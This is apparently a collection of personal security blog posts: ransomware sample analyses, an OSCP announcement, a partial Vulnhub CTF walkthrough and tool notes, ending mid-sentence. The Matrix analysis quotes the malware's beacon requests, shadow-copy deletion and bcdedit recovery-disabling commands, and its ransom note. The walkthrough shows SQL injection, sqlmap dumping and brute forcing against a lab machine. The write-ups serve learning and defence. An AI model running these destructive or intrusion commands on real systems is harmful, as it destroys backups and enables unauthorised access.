Starting Offensive Security Certified Professional (OSCP)

Offensive Security Certified Professional (OSCP)

I finally, thanks to my employer Atos, signed myself up for doing the OSCP examination. This means I need to follow the online Penetration Testing with Kali Linux course first before doing the actual 24 hour long exam.

The Offensive Security Certified Professional (OSCP) is the companion certification for our Penetration Testing with Kali Linux training course and is the world’s first completely hands-on offensive information security certification. The OSCP challenges the students to prove they have a clear and practical understanding of the penetration testing process and life-cycle through an arduous twenty-four (24) hour certification exam.

On 07-05 the OSCP virtual lab will be open to start. I’ll try to give regular updates about my experience with doing this OSCP certification. Until now most exams where more or less theoretical based. Prince 2 Foundation, Practitioner, IPMA D, all kind off Microsoft exams (MCSE), Certified Ethical Hacker were all theoretical and very superficial. Basically these are all read the book, try to estimate what they want you to know and go to the exam.

Having read a lot of other OSCP reviews I found that most people find this examination really challenging and recommend a lab time of at least 60 days. I’ll try to do the track in 30 days. We’ll see where it goes. I’ll stop reading all the comments now because most comments are about how difficult this track is.

Will keep you updated.

New Malware sample : Trojan-Ransom.Win32.Matrix.ac

Ransomware Matrix

Being up very early today I could not withstand the urge to pull another malware/virus sample from malwr.com.

I downloaded the following sample (which it now seems to be a second generation Matrix Ransomware variant):

SHA1 58a6234d3c6aed251b09b8f54611d9679c84af55
SHA256 e7b3102e3e49c6c3611353d704aae797923b699227df92d97987a2e012ba3f25

The malware analysis done on malwr.com shows a big variation in naming the sample, also no network traffic is seen in the network analysis section. Some similarities between the Antivirus vendors are the following names: Graftor, GenKryptik and Ransom Matrix.

The behavioral analysis shows that this executable starts some new processes with random names.

I have run the sample multiple times and the spinned up processes indeed seem to have a random name.

The Graftor sample, let’s just call it that way for minimal SEO purposes 🙂 uses the following order to load a first round unpacked executable in a new process with the same name as the initial executable: CreateProcessA, GetThreadContext, SetThreadContext followed by ReadProcessMemory and WriteProcessmemory. The WriteProcessmemory takes place in multiple loops.

Dumping the memory located in the ECX register gives me a dump which needs to be edited with a hex editor to make it a valid PE32 executable. There is a lot of ” junk” placed before the MZ signature that needs to be removed in order to make it a valid executable.

Ransomware Matrix

Removing all the data before the MZ signature will give you the following file:

PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed

SHA1 2c1b0fb35c8d4d2ce28190dc5e0ceeabddad35dc

SHA256 cf6ebd60cd7c46a0c17dc192322f4cd4fc93b44add0dae17abb0d6c0c203cf9e

The UPX unpacked file has a SHA256 of 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Virustotal shows a 17/61 detection ration for this sample. Kaspersky seems to mis it. The most common trojanname is vmHfa4YZuwfi . From the signature you can see that this time there is some network traffic. There are some request to a web api running on statcs.s76.r53.com.ua (31.41.216.90)

Sample of Ransomware Matrix network traffic:

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=WIN_5.1_32|ADMIN_YES|INT_0 HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=START HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=MASTER_STARTED HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

GET /addrecord.php?apikey=COSLb0cVd9bCx1vp&compuser=HOME|User&sid=irlmHunMm3S3KXH7&phase=PREPARING HTTP/1.0
Host: statcs.s76.r53.com.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

If you look at the GET request you see that the request follow a certain order that indicates the phase in which the local process is running.

More content will be added to this post because I only dumped the process, modified the dumped file to get a valid executable, unpack the sample and run it in virustotal and run it on malwr.com. Next is to let the new sample run to see what the end result is (is it some ransomware, a trojan, a backdoor?) and to debug is further in Olly.

Update:

Allright, part 2. I have loaded the unpacked malware sample into the debugger to see what it is about. Looking at the imported functions one can tell that it looks like the sample is probably also ransomeware. (some encryption functions and some filefind functions).

The Ransomware Matrix Dropped Files.

The sample creates a directory in C:\Users\*username*\AppData with the name faLI4zd2GZRK which is followed by creating a file that will be started used cmd.exe

SHA256: 3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

The common denominator between the recognized names is Ransomware Matrix, although the consistency between the antivirus vendors is big. (MSIL/MATRIX VARIANT)

Starting this file will spin a lot of processes. Mainly by using cmd.exe

6zZUGDT8.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\AAJQuHI7.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\AAJQuHI7.exe”

23Qn6rcH.cmd (cleanup)

ping -n 3 localhost

del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\YtzyQMj2.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\YtzyQMj2.exe”

bclFRufv.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\Gxu5OE8o.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\Gxu5OE8o.exe”

lUGRjier.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\uuNj0saB.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\uuNj0saB.exe”

OFZFP9q6.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\BqfAUxVQ.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\BqfAUxVQ.exe”

P7E4WtUK.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\zjVeqooM.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\zjVeqooM.exe”

qp3h899p.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\iRj4g0sE.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\iRj4g0sE.exe”

RMG5LL7V.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\psnwTLzb.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\psnwTLzb.exe”

tJxQTMw0.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\m1n0Sdz5.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\m1n0Sdz5.exe”

WnRddttG.cmd (cleanup)

ping -n 3 localhost
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\n9RwW8GD.exe”
del /f /q “C:\Users\MALWAR~1\AppData\Local\Temp\n9RwW8GD.exe”

adlo5t9M.cmd (disables shadow copies, disables boot to recovery and remove shadow copies)

echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
ping -n 30 localhost
wmic.exe process call create “cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures”
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
ping -n 10 localhost
cmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
ping -n 10 localhost
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK
vssadmin.exe delete shadows /all /quiet
echo qs2FH3oRkLCpGU8R3MtBRjxzx8lPA5EO48QBcTxkrUakK

Besides all the executables dropped in the temp folder there are also some other executables dropped and loaded. All 3 files are exactly the same -> Ransomware Matrix

tEajMFBE.exe

3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Trojan-Ransom.Win32.Matrix.ac

gvfkQqDU.exe

3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Trojan-Ransom.Win32.Matrix.ac

GGIU63mQ.exe

3b7fe3ec5d1ddb2c6666f099b8c97ef14616efde7adaec41fbbc69cdfd8687e1

Trojan-Ransom.Win32.Matrix.ac

Dropped Ransomware Message

Аttеntiоn! Аll yоur filеs wеrе еnсryрtеd with RSА-2048 аlgоrithm.
Withоut уоur pеrsоnаl dесrуptiоn kеy dаtа rеcоvеrу is impоssiblе!
Tо gеt yоur uniquе kеy аnd dесrурt thе filеs, Yоu hаvе to sеnd thе fоllоwing cоdе:
COSLb0cVd9bCx1vp-3D425A556DA60F50
tо оur е-mаil аddrеss: bluetablet9643@yahoo.com
Thеn Yоu will rеciеvе аll nеcеssаry instruсtiоns.
Yоu hаvе оnlу 96 hоurs tо rеcоvеr yоur dаtа! Аftеr this timе yоur uniquе dесrурtiоn kеy will bе аutоmаticаllу dеlеtеd аnd filе dесrурtiоn will bеcоmе imроssiblе!
Hurrу uр! Еасh 12 hоurs thе pауmеnt sizе will bе аutоmаticаllу inсrеаsеd bу 100$!
Аll thе аttеmpts оf dесryptiоn by yоursеlf will rеsult оnly in irrеvосаble lоss оf yоur dаtа.
If yоu still wаnt tо try tо dеcrypt thеm by yоursеlf plеаsе mаkе а bаckup аt first bеcаusе thе dесryptiоn will bеcоmе impоssiblе in cаsе оf аny chаngеs insidе thе filеs.
If yоu did nоt rеcеivе thе аnswеr frоm thе аfоrеcitеd еmаil fоr mоrе then 24 hours (аnd оnly in this cаsе!), usе thе rеsеrvе е-mаil аddrеss:
decodedecode@yandex.ru

The Ransomeware note shown in the background looks like this:Ransomware Matrix

Some more files which are created (or dropped) by Matrix Ransomware.

A file with an unique ID which has a code “b264-4739-96de-e3df2c740a1e” and my system name in it. Also most files end up being encrypted with the following extension added odbg201.zip.b10cked

Cerber Ransomeware Sample

Cerber Ransomware

Being interested in malware analyses I set myself the challenge of reversing a malware sample a week and posting about it on my blog. Being a perfectionist, it’s a bit difficult to post these struggles because I want it to come out as the malware reports being posted at Kaspersky Labs. However I should be very realisic here and take it step by step. Luckily there are a lot of online resources which help one battle the learning curve. There is also a vivid community out there that is always willing to help. Hasherezade is a perfect example if this. She is always willing to help. For this Cerber sample I reached out to here which resulted in a video about unpacking this Cerber variant.

The first lesson (previous post) learned is to have a working sample. Just run it on a machine and see if it behaves as expected. The torrentlocker sample in the previous post worked on malwr.com but not on my windows 10 or windows 7 machine. Couldn’t get it to work. Hence I started to work on another sample, namely this Cerber variant.

As far as I know there is no decryption possible of files encrypted by this Cerber Ransomware sample.

This Cerber ransomware sample has the following hash (packed)

831d40ec8b632c8cf4250695b7cf745bd573c86d7fdee5f0b02ea39d4f6bc20

AegisLab = Troj.W32.Generic!c
AhnLab-V3 = Win-Trojan/Cerber.Gen
AVware = Trojan.Win32.Generic.pak!cobra
Baidu = Win32.Trojan.Kryptik.anp
CrowdStrike = malicious_confidence_100% (W)
Endgame = malicious (moderate confidence)
Fortinet = W32/Kryptik.FPZX!tr
Invincea = virus.win32.ramnit.j
Kaspersky = HEUR:Trojan.Win32.Generic
McAfee-GW-Edition = BehavesLike.Win32.Ransomware.fh
McAfee = Artemis!410F7621BD5B
Rising = Trojan.Kryptik!8.8 (cloud:EDndvVDzOVF) 
SentinelOne = static engine - malicious
Sophos = Mal/Cerber-B
Symantec = Trojan.Gen.8!cloud
TrendMicro-HouseCall = Ransom_CERBER.SMEJ5
VIPRE = Trojan.Win32.Generic.pak!cobra
Webroot = W32.Trojan.Gen
ZoneAlarm = HEUR:Trojan.Win32.Generic

This time I have checked if it’s working 🙂

Cerber

Updated on this Cerber Sample:

I asked hasherezade for help after playing around for a few days trying to dump a valid executable from the process. I dumped some executables but probably to early in the process or the wrong ones. I think most of my time waste comes from setting breakpoints on the wrong locations which leads to stepping through code endlessly.

Now that I have an unpacked sample, I will glance at how the file encryption is done by this sample. Next again is to get another sample and set myself to the task again to dump a valid unpacked/unencrypted binary.

Below the video made by hasherezade. She makes this look really easy.

Unpacking Cerber Ransomware

Analyze some TorrectLocker variant

Trying to commit myself to delve into some malware analysis I already do a short announcement that I’m starting to analyze the following sample ->

SHA 256 df7b812698866cf104eb2050032da470a1dd4bf97f1f69ed5522d9ebd727cd13

MD5 0e0dec5e31efb8841954e6de6b57151e

It’s well detected and seems to be ransomware. So let’s see if this post will get some updates in the future.

Ad-Aware Dropped:Trojan.Generic.20526704 20170327
AegisLab Troj.Ad.Teerac!c 20170327
AhnLab-V3 Malware/Win32.Ransom_.C1881385 20170327
ALYac Dropped:Trojan.Generic.20526704 20170327
Antiy-AVL Trojan/Win32.BTSGeneric 20170327
Arcabit Trojan.Generic.D1393670 20170327
Avast Win32:Malware-gen 20170327
AVG Inject3.CEOC 20170327
Avira (no cloud) TR/AD.Teerac.ljbch 20170327
AVware Trojan.Win32.Generic!BT 20170327
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9998 20170327
BitDefender Dropped:Trojan.Generic.20526704 20170327
CAT-QuickHeal Ransom.Enestedel 20170327
Cyren W32/Trojan.XAFT-1332 20170327
DrWeb Trojan.Encoder.761 20170327
Emsisoft Dropped:Trojan.Generic.20526704 (B) 20170327
ESET-NOD32 Win32/Filecoder.TorrentLocker.A 20170327
F-Secure Trojan.Generic.20526704 20170327
Fortinet W32/Teerac.A!tr 20170327
GData Dropped:Trojan.Generic.20526704 20170327
Invincea trojandownloader.win32.zlob.ama 20170203
K7AntiVirus Trojan ( 004e24c81 ) 20170327
K7GW Trojan ( 004e24c81 ) 20170327
Kaspersky Trojan.NSIS.Sod.jot 20170327
Malwarebytes Ransom.FileCryptor 20170327
McAfee RDN/Ransom 20170327
McAfee-GW-Edition BehavesLike.AdwareDoma.fc 20170327
Microsoft Ransom:Win32/Teerac 20170327
eScan Dropped:Trojan.Generic.20526704 20170327
Panda Trj/Agent.MM 20170327
Rising Ransom.FileCryptor!8.1A7 (cloud:fQfnzKNcPvB) 20170327
Sophos Troj/TorrentL-Z 20170327
Symantec Trojan.Gen.NPE 20170327
TrendMicro Ransom_.9BF54A21 20170327
VIPRE Trojan.Win32.Generic!BT 20170327
Webroot W32.Trojan.Gen 20170327
ZoneAlarm by Check Point Trojan.NSIS.Sod.jot 20170327

Some first notes:

After run the malware checks what the current temp diretory is and tries to
write a file to the directry: nsk83FC.tmp

After run the malware checks what the current temp diretory is and tries to
write a file to the directry: nsk83FC.tmp

Next it immeditaly removes the file again. Apperently the malware wants to check if there is a writetable temp directory available.

Next it checks how the executable is running.

Followed is to check the size of the executable, which in my case is 370338 Bytes (5A6A2). It is compared to a value in EBX which seems to be 0 (??)
The size is saved in the data section. Next the jump is made based on jle with 0. So basically the jump is always taken.

The malware starts to create some files in the temp directory:

Flapdoodle, 275Kb File, binwalk gives 0 information, no readable strings

Gareth.dll 38KB File, Microsoft, Portable PE
This DLL seems to create a new process or inject code in a running process.It it also has a string reference to Flapdoodle and an interesting function _ReturnTilapia (to be analyzed)

Next it creates a directory in the Temp folder, nst4BA2.tmp which has the following files in it:

System.dll binwalk which is also a MS Executable.

Next the executable crashed with a message saying that : There is no email program associated to perform the requested action. Please install an email program or, if one is already installed, create an association in the defaults Pograms control panel.

After creating the files the malware tries to load Gareth.DLL but apprently this goes wrong.

Update: I cannot get this torrentlocker sample working. Tried on Win7 & Win10 64 Bit but no go. Will not work……..

So up to the next sample.

Kali Linux with intel OpenCL

Kali Linux with intel OpenCL

Also receiving the following error using KALI, HASHCAT and your Intel CPU -> clGetDeviceIDs(): CL_DEVICE_NOT_FOUND

Then follow these steps ->

$ mkdir intel-opencl
$ tar -C intel-opencl -Jxf intel-opencl-r3.1-BUILD_ID.x86_64.tar.xz
$ tar -C intel-opencl -Jxf intel-opencl-devel-r3.1-BUILD_ID.x86_64.tar.xz
$ tar -C intel-opencl -Jxf intel-opencl-cpu-r3.1-BUILD_ID.x86_64.tar.xz
$ sudo cp -R intel-opencl/* /
$ sudo ldconfig

tar the version downloaded. At this time 4.x

 

 

 

 

DEF CON 23 – Marquis-Boire, Marschalek, Guarnieril – F the attribution, show us your .idb

Over the past few years state-sponsored hacking has received attention that would make a rockstar jealous. Discussion of malware has shifted in focus from ‘cyber crime’ to ‘cyber weapons’, there have been intense public debates on attribution of various high profile attacks, and heated policy discussion surrounding regulation of offensive tools. We’ve also seen the sale of ‘lawful intercept’ malware become a global trade.

While a substantial focus has revolved around the activities of China, Russia, and Iran, recent discoveries have revealed the capabilities of Western nations such as WARRIORPRIDE aka. Regin (FVEY) and SNOWGLOBE aka. Babar (France). Many have argued that digital operations are a logical, even desirable part of modern statecraft. The step from digital espionage to political persecution is, however, a small one. Commercially written, offensive software from companies like FinFisher and Hacking Team has been sold to repressive regimes under the guise of ‘governmental intrusion’ software.

Nation state hacking operations are frequently well-funded, difficult to attribute, and rarely prosecuted even if substantive evidence can be discovered. While efforts have been made to counter this problem, proof is hard to find and even more difficult to correctly interpret. This creates a perfect storm of conditions for lies, vendor lies, and flimsy attribution.

In this talk we will unveil the mess happening backstage when uncovering nation state malware, lead the audience on the track of actor attribution, and cover what happens when you find other players on the hunt. We will present a novel approach to binary stylometry, which helps matching binaries of equal authorship and allows credible linking of binaries into the bigger picture of an attack. After this session the audience will have a better understanding of what happened behind the scenes when the next big APT report surfaces.

Speaker Bios:
Morgan Marquis-Boire is a Senior Researcher at the Citizen Lab, University of Toronto. He is the Director of Security for First Look Media and a contributing writer for The Intercept. Prior to this, he worked on the security team at Google. He is a Special Advisor to the Electronic Frontier Foundation in San Francisco and an Advisor to the United Nations Inter-regional Crime and Justice Research Institute. In addition to this, he serves as a member of the Freedom of the Press Foundation advisory board and as an advisor to Amnesty International.

Marion is a malware reverse engineer on duty for Cyphort Inc., focussing on the analysis of emerging threats and exploring novel methods of threat detection. She teaches malware analysis at University of Applied Sciences St. Pölten and frequently appears as speaker at international conferences. Two years ago Marion won Halvar Flake’s reverse engineering challenge for females, since then she set out to threaten cyber criminals. She practices martial arts and has a vivid passion for taking things apart. Preferably, other people’s things.

Claudio is a security researcher mostly specialized in the analysis of malware, botnets and computer attacks in general. He’s a core member of The Honeynet Project and created the open source malware analysis software Cuckoo Sandbox and Viper and runs the Malwr free service. Claudio published abundant research on botnets and targeted attacks and presented at conferences such as Hack In The Box, BlackHat, Chaos Communication Congress and many more. In recent years he devoted his attention especially on issues of privacy and surveillance and published numerous articles on surveillance vendors such as FinFisher and HackingTeam with the Citizen Lab as well as on NSA/GCHQ and Five Eyes surveillance capabilities with The Intercept and Der Spiegel. Claudio also contributes to Global Voices Advocacy. He continuously researches and writes on government surveillance and threats to journalists and dissidents worldwide and supports human rights organisations with operational security and emergency response.

T-Pot HoneyPot

Yesterday I came across a really great Honeypot. Since I don’t have much time I just repost their main page -> source

T-Pot is based on Ubuntu Server 14.04.4 LTS. The honeypot daemons as well as other support components being used have been paravirtualized using docker. This allowed us to run multiple honeypot daemons on the same network interface without problems make the entire system very low maintenance.
The encapsulation of the honeypot daemons in docker provides a good isolation of the runtime environments and easy update mechanisms.

In T-Pot we combine the dockerized honeypots conpot, cowrie, dionaea, elasticpot, emobility, glastopf and honeytrap with suricata a Network Security Monitoring engine and the ELK stack to beautifully visualize all the events captured by T-Pot. Events will be correlated by our own data submission tool ewsposter which also supports Honeynet project hpfeeds honeypot data sharing.

T-Pot HoneyPot

All data in docker is volatile. Once a docker container crashes, all data produced within its environment is gone and a fresh instance is restarted. Hence, for some data that needs to be persistent, i.e. config files, we have a persistent storage /data/ on the host in order to make it available and persistent across container or system restarts.
Important log data is now also stored outside the container in /data/<container-name> allowing easy access to logs from within the host and. The upstart scripts have been adjusted to support storing data on the host either volatile (default) or persistent (/data/persistence.on).

Read more @ http://dtag-dev-sec.github.io/mediator/feature/2016/03/11/t-pot-16.03.html

IMF Walkthrough (Vulnhub)

Geckom uploaded his first vulnerable machine to vulnhub.com.

As posted before you can find a lot of (mostly) virtualbox images which are vulnerable in several ways. Usually there is one goal, find an x number of flags with the last flag being available only when you rooted the system. The vulnerabilities range from insecure web applications to insecure and/or old or self made services, the need to use port knocking, stuff hidden in images, reverse engineering (buffer overflows), cryptography and many more.

The information given @vulnhub about IMF does not tell you how much flags there are ->

There are walkthroughs available in case you get stuck. No walkthrough is posted for the IMF challenge but I did see some tweets from people having solved IMF.

Welcome to “IMF”, my first Boot2Root virtual machine. IMF is a intelligence agency that you must hack to get all flags and ultimately root. The flags start off easy and get harder as you progress. Each flag contains a hint to the next flag. I hope you enjoy this VM and learn something.

Difficulty: Beginner/Moderate

Can contact me at: geckom at redteamr dot com or on Twitter: @g3ck0m

So let’s see what IMF is about:

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF – Homepage

OS details: Linux 3.2 – 4.4, Linux 4.4
TCP/IP fingerprint:
OS:SCAN(V=7.31%E=4%D=11/2%OT=80%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=5819
OS:934A%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=104%TI=Z%TS=8)OPS(O1=M5B
OS:4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6
OS:=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF
OS:=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)I
OS:E(R=N)

Going to the webpage will show the page below:

IMF Vulnhub

I always download images from websites to see if there is something hidden in them, binaries, strings or other useful artifacts. I use binwalk and Exiftool to get some more information. The IMF logo above has no information in it that is usable.

The image on the project page (brain.jpg) seems to hold some usable information in the IPTC Digest.

Current IPTC Digest : d41d8cd98f00b204e9800998ecf8427e
IPTC Digest : d41d8cd98f00b204e9800998ecf8427e

Trying to crack the MD5 hash i found this hash to be generated using: md5sum /dev/null

I’m not sure if the above hash is something we need to use later on. It’s certainly no flag because after viewing the source of every page I found flag 1 ( YWxsdGhlZmlsZXM= -> Decoded -> allthefiles


&lt;section id="service"&gt;

&lt;div class="container"&gt;
            &lt;!-- flag1{YWxsdGhlZmlsZXM=} --&gt;

&lt;div class="service-wrapper"&gt;

&lt;div class="row"&gt;

&lt;div class="col-md-4 col-sm-6"&gt;

&lt;div class="block wow fadeInRight" data-wow-delay="1s"&gt;

&lt;div class="icon"&gt;
                               &lt;i class="fa fa-desktop"&gt;&lt;/i&gt; 
                            &lt;/div&gt;

                            

&lt;h3&gt;Roger S. Michaels&lt;/h3&gt;



rmichaels@imf.local



Director

                        &lt;/div&gt;


What I also noticed, after a while I must say, is that 3 filenames are parts of a base64 encoded string. flag2{aW1mYWRtaW5pc3RyYXRvcg==} -> decoded imfadministrator


I often find myself puzzling around long enough to forget the previous hint 😉 (allthefiles) I first combined the filenames using the order as found in the BURP target window, not the head section of the index/contact or project.php file.

IMF Vulnhubflag2_decryptedIn the background dirbuster is running. So far, after an hour running, I only find a directory on the webserver called /less which gives me a forbidden message. There are no other open ports so I resume to scroll through the files on the webserver.

Since I have no login page and no other input fields other then the contact form, I decided to just use the “imfadministrator” as a directory. This gives me a login screen.

I have stopped dirbuster because I’m just impatient. In previous CTF’s I found the results to be there quickly. If it takes long, then the probability of getting results using this methods is not that big. Usually this indicates a dead end. Let’s keep the ” less”  directory in the back of the mind.

Vulnhub IMFViewing the source of this page gives us a clue on how to proceed:  <!– I couldn’t get the SQL working, so I hard-coded the password. It’s still mad secure through. – Roger –>

So let’s see. username: Roger, password: madsecure fail, same for imfadministrator, fail….What I notice is that the error message is very specific, namely “invalid username”. Let’s try the 3 names showed at the contact page rmichaels@imf.local, fail, invalid username, now without the @imf.local, invalid password. So rmichaels is a valid username. Let’s check the other 2. estone and akeith are both invalid. So the hamering needs to be done using the rmichaels account

While hydra is brute forcing the login page with rmichaels as a username I also found some other pages http://192.168.1.68/imfadministrator/cms.php (using dirbuster / files only pure brute force no list) and http://192.168.1.68/imfadministrator/uploads/ (403).

After hours of brute force and guessing I decided to check the walk through made by g0blin. I was totally stuck. flag3{Y29udGludWVUT2Ntcw==} /continueTOcms can be received by editing the name of the password field with using inspect element. So far for the hamering 🙁

We take the hint and continue to the CMS which gives the screen below:

IMF Vulnhub

Throwing some garbage @ http://192.168.1.68/imfadministrator/cms.php?pagename=/../../..%27%27/etc/passwd%27%27%27 broke the sql query. So probably we have a SQL Injection point here.

Warning: mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/imfadministrator/cms.php on line 29

Easiest way to continue is to capture a valid request such as http://192.168.1.68/imfadministrator/cms.php?pagename=home in burp, save the request in a file and start SQLMAP using: sqlmap -r “path to saved file”

IMF Vulnhub

And oops there it is. We have an SQL injection which we can exploit. Let’s poke around in the database!

Making a dump of the admin database I quickly managed to find flag 4 from a QR code in an image (flag4{dXBsb2Fkcjk0Mi5waHA=} -> decoded -> uploadr942.php

The QR code is on the following page -> http://192.168.1.68/imfadministrator/cms.php?pagename=tutorials-incomplete

SQLMAP command: sqlmap -r “path to saved file” -D admin –dump-all

Using the decoded previous flag brings us to the following page:

http://192.168.1.68/imfadministrator/uploadr942.php

IMF VulnhubLet’s see if we can upload some simple shells that come with KALI. Picking a simple backdoor PHP file will throw an error telling me that the filetype is invalid. Let’s try to upload a renamed php file (jpg). Seem that only upload allowed are images.

Trying to append a jpg extension to a PHP gives me: Error: CrappyWAF detected malware. Signature: system php function detected.

I’ll continue with IMF walkthrough on friday/saturday. So flag 5 and 6 are pending. I spent a lot of time getting something out of the Intelligence Upload Form but so far not that much progress. Better to take some distance and have another try in some days. 

Nemucod, the dropped files

Yesterday I posted a blog about Cuckoo  & Nemucod. It looked like the Nemucod sample downloaded 2 files successfully, but after reading the Kahu Security write up of the same sample, stating that there were no successful downloads, I immediately had a look this morning what was in the files. Both dropped files just state an error message. One is a 403 error and the other one something to do with db not allowed.

I assumed (bad bad bad) hat something was in both files since I saw this sample download some files with interesting content last week. After a closer look the download sites seem to be either down or removed the downloadable content from their sites. Luckily malwr.com holds the submitted sample with the dropped files.

Be aware that this Nemucod downloader has a certain job id. The same file is in the wild with different JobID’s with different payloads to be downloaded. The JobID for this sample is: uDvjhoi Threathminer gives 191 results related to this sample. Probably there is not much difference between the sample other than the JobID.

So what do we have.

XhrqpFwuqG2 334 bytes   HTML document, ASCII text  -> no matches virustotal/yara

b25e30c420aee02c187f2cc3ff1f17b3a911a0bdfc2368ebeb0a7a5a82f8b319

This file contains an error message:

You don’t have permission to access /g7fb6v

g7fb6v[1].htm 511 bytes  ASCII text  -> no matches virustotal/yara

9497256e044110c051052b2fc31b3d16ed14e8233fa2f60e8ce83127b95b9ed2

This file contains an error.

require(/home/lkadz/public_html/naturesagro.com/wp-includes/functions.php): failed to open stream: No such file or directory in <b>/home/lkadz/public_html/naturesagro.com/wp-settings.php</b> on line <b>65</b><br

XhrqpFwuqG4 HTML document, ASCII text, with very long lines, with CRLF, LF line terminators  -> no matches virustotal/yara

73831709d228ae752c6d41016fff10a7caa984da7bb8edab38cfff2df5c1f4fc

Having a closer look (binwalk, atom) this is nothing more than a HTML document with some javascript in it. Nothing special though.

So no payloads 🙁 Searched the web but seems that this sample was not very successful. Probably because the sample was already end of line and well detected by most AV products.

Analyse Malware & Ransomware with Cuckoo

Cuckoo Malware

Analyse Malware and Ransomware with Cuckoo

Last week I started with manual debugging a file which I received from Advissa Ludvinka, a non-existing person. Since the beginning of this year I picked up my old passion for debugging malware & viruses, looking into buffer overflows, playing capture the flags on-line (root-me.org, ctf365), off-line (application) penetration testing (offline <> vulnhub, mutillidae, OWASP Juice shop, DVWA) and other general (information) security subjects. Some 20+ years ago I used to sit behind multiple screens for days in row figuring out (reverse engineering) the way viruses (with their encryption and stealth abilities), games (to give me more “lives”), worms and other software worked. At that time it was very hard to learn this by yourself because the only sources of information were the bulletin board systems of that time. No youtube, not that much documentation, no communities and no advanced/mature tools. I remember me sitting there behind the screen for days in a row with a load of assembly language on the screen and a big boring book in my hands trying to figure out what all those asm was about. I’ll refrain defining this as the good old days.

Nowadays there are a lot of online tutorials, online/offline and active communities, well written books (< not only very hardcore technical books) and last but not least there are a lot of very active open-source communities building highly advanced/mature tools. The advanced tools are a double-edged-sword in multiple ways. Having such advanced tools freely available (SQLMAP, OWASP ZAP, OpenVAS/Nessas, Metasploit, SET < basically whole KALI distro), lowers the level of knowledge needed to perform advanced “attacks”. This basically means everybody, with some basic knowledge about computers/networks, can use the tools and use them “effectively”. It doesn’t require deep SQL or application infrastructure knowledge to googledork a site, try the well known ” ‘ “, capture a request with BURP, feed it to SQLMAP and dump a database from a website vulnerable to an SQL Injection. On the other side the same tools are enablers for more secure corporate environments. They are of tremendous help in the daily work of professional penetration testers both for applications and infrastructure, security analysts and for other people in infosec jobs. People in those jobs need to be constantly aware of the knowledge trap inherent in using these tools. It has the risk of getting dependable on tools only instead of on acquired knowledge. Using tools only has the potential of ending up with a nice report without knowing, really knowing, what is in the report. Running an OpenVAS or Nessus 